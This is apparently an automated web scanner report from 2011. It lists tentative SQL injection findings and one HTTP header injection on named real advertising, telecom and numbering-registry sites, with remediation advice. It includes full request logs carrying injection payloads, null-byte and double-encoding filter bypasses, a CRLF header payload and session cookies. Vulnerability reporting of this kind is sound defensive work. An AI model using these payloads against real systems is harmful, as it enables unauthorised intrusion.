XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://googleads.g.doubleclick.net/pagead/ads [frm parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0%00'&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0%00''&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.2. http://googleads.g.doubleclick.net/pagead/ads [ga_sid parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The ga_sid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_sid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ga_sid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155%2527&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155%2527%2527&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.sprint.com
Path:	/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b%00'/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:34:41 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:34:41 GMT
Server: Omniture DC/2.0.0
xserver: www612
Content-Length: 0
Content-Type: text/html

1.4. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.sprint.com
Path:	/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss%00'/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:35:07 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:35:07 GMT
Server: Omniture DC/2.0.0
xserver: www617
Content-Length: 0
Content-Type: text/html

1.5. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do [codeQueryModel.stateAbbr parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.nationalnanpa.com
Path:	/nas/public/assigned_code_query_step1.do

Issue detail

The codeQueryModel.stateAbbr parameter appears to be vulnerable to SQL injection attacks. The payloads 13320976'%20or%201%3d1--%20 and 13320976'%20or%201%3d2--%20 were each submitted in the codeQueryModel.stateAbbr parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /nas/public/assigned_code_query_step1.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
Referer: http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do?method=selectNpas
Cache-Control: max-age=0
Origin: http://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000
Content-Length: 52

codeQueryModel.stateAbbr=AK13320976'%20or%201%3d1--%20&codeQueryModel.nasNpaId=

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:14:44 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18780

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</option>
<option value="442">442</option>
<option value="938">938</option>
<option value="458">458</option>
<option value="534">534</option>
<option value="929">929</option>
<option value="952">952</option>
<option value="956">956</option>
<option value="970">970</option>
<option value="972">972</option>
<option value="386">386</option>
<option value="380">380</option>
<option value="628">628</option>
<option value="951">951</option>
<option value="769">769</option>
<option value="684">684</option>
<option value="762">762</option>
<option value="424">424</option>
<option value="779">779</option>
<option value="575">575</option>
<option value="657">657</option>
<option value="681">681</option>
<option value="747">747</option>
<option value="872">872</option>
<option value="531">531</option>
<option value="327">327</option>
<option value="539">539</option>
<option value="201">201</option>
<option value="202">202</option>
<option value="203">203</option>
<option value="205">205</option>
<option value="206">206</option>
<option value="207">207</option>
<option value="208">208</option>
<option value="209">209</option>
<option value="210">210</option>
<option value="212">212</option>
<option value="213">213</option>
<option value="215">215</option>
<option value="217">217</option>
<option value="219">219</option>
<option value="225">225</option>
<option value="229">229</option>
<option value="234">234</option>
<option value="240">240</option>
<option value="252">252</option>
<option value="253">253</option>
<option value="256">256</option>
<option value="262">262</option>
<option value="269">269</option>
<option value="281">281</option>
<option value="301">301</option>
<option value="303">303</option>
<option value="305">305</option>
<option value="307">307</option>
<option value="309">309</option>
<option value="312">312</option>
<option value="314">314</option>
<option value="316">316</option>
<option value="318">318</
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:14:45 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 8478

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</option></select>
</td>
</tr>

<tr>
<td colspan="2" align="center">
<br>
</td>
</tr>

<tr>
<td colspan="2" align="center">
<input type="submit" value="Continue">
<input type="reset" value="Reset">
</td>
</tr>
</table>

</form>

</td>
</tr>
<tr height="2%">
<td colspan="2" align="center">

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center" valign="middle" height="2" colspan="3" bgcolor="#cccccc"><img src="/nas/public/images/px_CCCCCC.gif" width="1" height="1"></td>
</tr>
<tr>
<td align="left" valign="middle" width="81"><a href="http://www.neustar.biz" target="_blank"><img src="/nas/public/images/neustar_logo.gif" width="81" height="19" border="0" alt="www.neustar.biz"></a></td>
<td align="center" valign="middle" width="464">
<span class="footer">© 2010 NeuStar, Inc.</span>
<a class="footer" href="http://www.nanpa.com/content/legalNotice.html">Legal Notice/Disclaimer</a>.
</td>
<td align="right" valign="middle" width="200">
<p class="footer">Last updated:
<script language="JavaScript">
<!-- Begin
var months = new Array(13);
months[1] = "January";
months[2] = "February";
months[3] = "March";
months[4] = "April";
months[5] = "May";
months[6] = "June";
months[7] = "July";
months[8] = "August";
months[9] = "September";
months[10] = "October";
months[11] = "November";
months[12] = "December";
var dateObj = new Date(document.lastModified);
var lmonth = months[dateObj.getMonth() + 1];
var date = dateObj.getDate();
var fyear = dateObj.getYear();
if (fyear < 2000)
fyear += 1900;
document.write(lmonth + " " + date + ",
...[SNIP]...

2. HTTP header injection previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/connectedplanet.iclick.com/adtarget

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7cb05%0d%0a98d04ffcdd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

